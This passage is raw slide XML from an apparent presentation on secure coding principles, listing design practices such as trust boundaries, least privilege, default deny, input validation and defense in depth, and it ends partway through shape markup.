              <a:t>Principles</a:t>
            </a:r>
            <a:endParaRPr sz="2799"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="916700" y="1332268"/>
            <a:ext cx="10060224" cy="1481069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109187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Secure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Coding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Principles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could be described as Laws or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Rules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that if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followed,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will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lead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desired outcomes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5078" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2589"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="81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Each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described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3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design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pattern,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but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they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are less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formal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nature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than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 design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pattern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7245" y="452895"/>
            <a:ext cx="5471005" cy="1783249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84730" indent="-172668" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="10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srgbClr val="001F5F"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Creating</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-30" dirty="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srgbClr val="001F5F"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-10" dirty="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srgbClr val="001F5F"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-60" dirty="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srgbClr val="001F5F"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="001F5F"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> Principles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defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="15"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="001F5F"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pP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570059" lvl="1" indent="-215200" defTabSz="914126">
              <a:buSzPct val="109090"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="570694" algn="l"/>
              </a:tabLst>
            </a:pP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Understanding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Coding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Principles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70059" lvl="1" indent="-215200" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="135"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="109090"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="570694" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2199" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Common</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="1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srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="2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srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Coding</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199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srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Principles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70059" lvl="1" indent="-215200" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
              <a:buSzPct val="109090"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="570694" algn="l"/>
              </a:tabLst>
            </a:pP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Summary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188578" y="6479049"/>
            <a:ext cx="83798" cy="1282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defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="955"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:endParaRPr sz="9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73088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105383" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="90143" marR="5195916">
              <a:lnSpc>
                <a:spcPts val="2589"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="830"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Common Secure </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>Coding </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Principles </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-690" dirty="0"/>
              <a:t>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spc="-5" dirty="0"/>
              <a:t>Principles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xfrm>
            <a:off x="916462" y="1800688"/>
            <a:ext cx="3948278" cy="4347238"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="33011" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="184730" indent="-172668">
              <a:spcBef>
                <a:spcPts val="260"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="185364" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>By</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Design</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="355493">
              <a:spcBef>
                <a:spcPts val="145"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2199" spc="10" dirty="0"/>
              <a:t>–Establish</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-50" dirty="0"/>
              <a:t>Trust</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-5" dirty="0"/>
              <a:t>Boundaries</a:t>
            </a:r>
            <a:endParaRPr sz="2199"/>
          </a:p>
          <a:p>
            <a:pPr marL="355493">
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2199" spc="20" dirty="0"/>
              <a:t>–Don't</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-15" dirty="0"/>
              <a:t>Reinvent</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-10" dirty="0"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-5" dirty="0"/>
              <a:t>Wheel</a:t>
            </a:r>
            <a:endParaRPr sz="2199"/>
          </a:p>
          <a:p>
            <a:pPr marL="355493">
              <a:spcBef>
                <a:spcPts val="135"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2199" spc="10" dirty="0"/>
              <a:t>–Economy </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-5" dirty="0"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-5" dirty="0"/>
              <a:t>Mechanism</a:t>
            </a:r>
            <a:endParaRPr sz="2199"/>
          </a:p>
          <a:p>
            <a:pPr marL="355493">
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2199" spc="-15" dirty="0"/>
              <a:t>–Trust</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-15" dirty="0"/>
              <a:t>Reluctance</a:t>
            </a:r>
            <a:endParaRPr sz="2199"/>
          </a:p>
          <a:p>
            <a:pPr marL="355493">
              <a:spcBef>
                <a:spcPts val="135"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2199" spc="25" dirty="0"/>
              <a:t>–Open</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-30" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-10" dirty="0"/>
              <a:t>Design</a:t>
            </a:r>
            <a:endParaRPr sz="2199"/>
          </a:p>
          <a:p>
            <a:pPr marL="355493">
              <a:spcBef>
                <a:spcPts val="135"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2199" spc="10" dirty="0"/>
              <a:t>–Minimize</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-10" dirty="0"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-10" dirty="0"/>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-10" dirty="0"/>
              <a:t>Surface</a:t>
            </a:r>
            <a:endParaRPr sz="2199"/>
          </a:p>
          <a:p>
            <a:pPr marL="355493">
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2199" spc="15" dirty="0"/>
              <a:t>–Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-5" dirty="0"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-25" dirty="0"/>
              <a:t>Weakest</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="35" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-5" dirty="0"/>
              <a:t>Link</a:t>
            </a:r>
            <a:endParaRPr sz="2199"/>
          </a:p>
          <a:p>
            <a:pPr marL="184730" indent="-172668">
              <a:spcBef>
                <a:spcPts val="515"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="185364" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>By</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Default</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="355493">
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2199" spc="35" dirty="0"/>
              <a:t>–Use</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-5" dirty="0"/>
              <a:t>Least</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-10" dirty="0"/>
              <a:t>Privilege</a:t>
            </a:r>
            <a:endParaRPr sz="2199"/>
          </a:p>
          <a:p>
            <a:pPr marL="355493">
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2199" spc="35" dirty="0"/>
              <a:t>–Use</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-10" dirty="0"/>
              <a:t>Default</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-15" dirty="0"/>
              <a:t>Deny</a:t>
            </a:r>
            <a:endParaRPr sz="2199"/>
          </a:p>
          <a:p>
            <a:pPr marL="355493">
              <a:spcBef>
                <a:spcPts val="135"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2199" spc="5" dirty="0"/>
              <a:t>–Fail</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-35" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-10" dirty="0"/>
              <a:t>Securely</a:t>
            </a:r>
            <a:endParaRPr sz="2199"/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xfrm>
            <a:off x="6248321" y="1800689"/>
            <a:ext cx="3837209" cy="3644921"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="33011" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="172668" marR="127597" indent="-172668" algn="r">
              <a:spcBef>
                <a:spcPts val="260"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="172668" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>By</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> Communication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="71099" algn="r">
              <a:spcBef>
                <a:spcPts val="145"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2199" spc="15" dirty="0"/>
              <a:t>–Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-50" dirty="0"/>
              <a:t>Trust</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-10" dirty="0"/>
              <a:t>Relationships</a:t>
            </a:r>
            <a:endParaRPr sz="2199"/>
          </a:p>
          <a:p>
            <a:pPr marL="172668" marR="97761" indent="-172668" algn="r">
              <a:spcBef>
                <a:spcPts val="505"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="172668" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>by</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-35" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Implementation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="53959" algn="r">
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2199" spc="5" dirty="0"/>
              <a:t>–Psychological</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-10" dirty="0"/>
              <a:t>Acceptability</a:t>
            </a:r>
            <a:endParaRPr sz="2199"/>
          </a:p>
          <a:p>
            <a:pPr marR="5078" algn="r">
              <a:spcBef>
                <a:spcPts val="135"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2199" spc="20" dirty="0"/>
              <a:t>–Least</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-5" dirty="0"/>
              <a:t> Common</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-5" dirty="0"/>
              <a:t>Mechanism</a:t>
            </a:r>
            <a:endParaRPr sz="2199"/>
          </a:p>
          <a:p>
            <a:pPr marL="355493">
              <a:spcBef>
                <a:spcPts val="135"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2199" dirty="0"/>
              <a:t>–Validate</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-10" dirty="0"/>
              <a:t>Inputs</a:t>
            </a:r>
            <a:endParaRPr sz="2199"/>
          </a:p>
          <a:p>
            <a:pPr marL="355493">
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2199" spc="15" dirty="0"/>
              <a:t>–Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-10" dirty="0"/>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-5" dirty="0"/>
              <a:t>at</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-15" dirty="0"/>
              <a:t>Rest</a:t>
            </a:r>
            <a:endParaRPr sz="2199"/>
          </a:p>
          <a:p>
            <a:pPr marL="355493">
              <a:spcBef>
                <a:spcPts val="135"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2199" spc="10" dirty="0"/>
              <a:t>–Prevent</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-10" dirty="0"/>
              <a:t>Bypass</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-10" dirty="0"/>
              <a:t>Attacks</a:t>
            </a:r>
            <a:endParaRPr sz="2199"/>
          </a:p>
          <a:p>
            <a:pPr marL="355493">
              <a:spcBef>
                <a:spcPts val="135"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2199" spc="20" dirty="0"/>
              <a:t>–Audit</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-5" dirty="0"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-30" dirty="0"/>
              <a:t>Verify</a:t>
            </a:r>
            <a:endParaRPr sz="2199"/>
          </a:p>
          <a:p>
            <a:pPr marL="355493">
              <a:spcBef>
                <a:spcPts val="145"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2199" spc="5" dirty="0"/>
              <a:t>–Defense</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-5" dirty="0"/>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-10" dirty="0"/>
              <a:t>Depth</a:t>
            </a:r>
            <a:endParaRPr sz="2199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648" y="668993"/>
            <a:ext cx="10512862" cy="12536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99">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90143">
              <a:spcBef>
                <a:spcPts val="2714"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Creating</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Principles</a:t>
            </a:r>
            <a:endParaRPr sz="2699"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1253417" y="2639427"/>
            <a:ext cx="3470641" cy="2737472"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="35551" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12696" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="280"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2399" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Secure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By</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-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Design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6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srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Establish</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-3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1999" spc="-40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Trust</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-3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srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Boundaries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6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Don't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Reinvent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Wheel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7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Economy</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="199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Mechanism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55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199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Reluctance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55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Open</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-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Design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7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Minimize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Attack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Surface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55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Weakest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Link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4701399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5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5" dirty="0"/>
              <a:t>Establish</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-55" dirty="0"/>
              <a:t>Trust</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="35" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Boundaries</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="60" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="25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32267"/>
            <a:ext cx="9073057" cy="391058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84730" indent="-172668" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="10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If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recall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diagram,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shows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Boundary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around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3612" y="1661365"/>
            <a:ext cx="3567771" cy="2092415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217739" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef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application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298995" marR="5078" indent="-298995" defTabSz="914126">
              <a:lnSpc>
                <a:spcPct val="117500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1025"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="298995" algn="l"/>
                <a:tab pos="299630" algn="l"/>
              </a:tabLst>
            </a:pP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The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30" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Trust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Boundary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is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an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imaginary </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-39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border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that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architects</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="2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5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>create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  <a:p>
            <a:pPr marL="354859" lvl="1" indent="-286934" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="815"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="354859" algn="l"/>
                <a:tab pos="355493" algn="l"/>
              </a:tabLst>
            </a:pP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By</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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making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everything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inside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it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  <a:p>
            <a:pPr marL="354859" defTabSz="914126"/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trustworthy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  <a:p>
            <a:pPr marL="354859" lvl="1" indent="-286934" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="354859" algn="l"/>
                <a:tab pos="355493" algn="l"/>
              </a:tabLst>
            </a:pP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By</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-3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definition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49590" y="4894452"/>
            <a:ext cx="629756" cy="228209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1400" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000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FFC000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>hreats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935830" y="3054067"/>
            <a:ext cx="2680272" cy="820205"/>
            <a:chOff x="5937377" y="3053969"/>
            <a:chExt cx="2680970" cy="820419"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="object 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7379462" y="3053969"/>
              <a:ext cx="1238885" cy="487680"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1238884" h="487679">
                  <a:moveTo>
                    <a:pt x="1163559" y="26386"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="468630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7111" y="487172"/>
                  </a:lnTo>
                  <a:lnTo>
